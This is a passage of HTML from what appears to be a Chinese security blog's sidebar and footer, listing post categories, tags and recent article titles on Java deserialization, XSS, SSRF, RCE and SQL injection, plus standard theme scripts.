href="/categories/linux%E6%8F%90%E6%9D%83/">linux提权</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/tools/">tools</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BA%91%E5%AE%89%E5%85%A8/">云安全</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%8D%E6%9D%80/">免杀</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%86%85%E7%BD%91/">内网</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">基础知识</a><span class="category-list-count">8</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">权限提升</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/">漏洞发现</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">基础</a> <a href="/tags/%E5%85%8D%E6%9D%80/" style="font-size: 15px;">免杀</a> <a href="/tags/Js%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Js安全</a> <a href="/tags/Java%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">Java基础</a> <a href="/tags/Java%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Java安全</a> <a href="/tags/PHP%E5%AE%89%E5%85%A8/" style="font-size: 15px;">PHP安全</a> <a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">PHP代码审计</a> <a href="/tags/Java-Web%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/" style="font-size: 15px;">Java Web常见漏洞</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 15px;">靶场</a> <a href="/tags/linux%E6%8F%90%E6%9D%83/" style="font-size: 15px;">linux提权</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">代码审计</a> <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" style="font-size: 15px;">云安全</a> <a href="/tags/tools/" style="font-size: 15px;">tools</a> <a href="/tags/%E5%86%85%E7%BD%91/" style="font-size: 15px;">内网</a> <a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/" style="font-size: 15px;">权限提升</a> <a href="/tags/Win%E6%8F%90%E5%8D%87/" style="font-size: 15px;">Win提升</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/" style="font-size: 15px;">漏洞发现</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2025/09/02/Java%E5%AE%89%E5%85%A8-CC1-LazyMap/">CommonsCollections1</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/09/01/Java%E5%AE%89%E5%85%A8-CC1%E9%93%BE/">CommonsCollections1</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/24/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">Java 反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/23/java%20Xss%E6%BC%8F%E6%B4%9E/">Java Xss漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/23/java%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">Java 任意文件上传漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/21/java%E6%96%87%E4%BB%B6%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/">Java Web文件访问漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/10/ssrf/">SSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/07/rce/">Rce</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/07/%E6%95%B0%E6%8D%AE%E5%BA%93%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BF%E7%AF%87-mysql/">sql注入与数据库利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/08/07/sql%E6%B3%A8%E5%85%A5/">sql注入与数据库利用</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div></div></div></div><div class="pure-u-1 pure-u-md-3-4"></div></div><script type="text/javascript" src="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=undefined" async></script><link rel="stylesheet" type="text/css" href="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.css"><link rel="stylesheet" type="text/css" href="/css/search.css?v=undefined"><script type="text/javascript" src="/js/search.js?v=undefined"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
  search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" color="0,0,0" opacity="0.5" zIndex="-2" count="50" src="https://unpkg.com/canvas-nest.js/dist/canvas-nest.js"></script><script type="text/javascript" src="/js/love.js?v=undefined"></script><script type="text/javascript" src="/js/copycode.js?v=undefined" successtext="复制成功！"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=undefined"><link rel="stylesheet" type="text/css" href="/css/external.css?v=undefined"><script type="text/javascript" src="/js/codeblock-resizer.js?v=undefined"></script><script type="text/javascript" src="/js/smartresize.js?v=undefined"></script></div></body></html>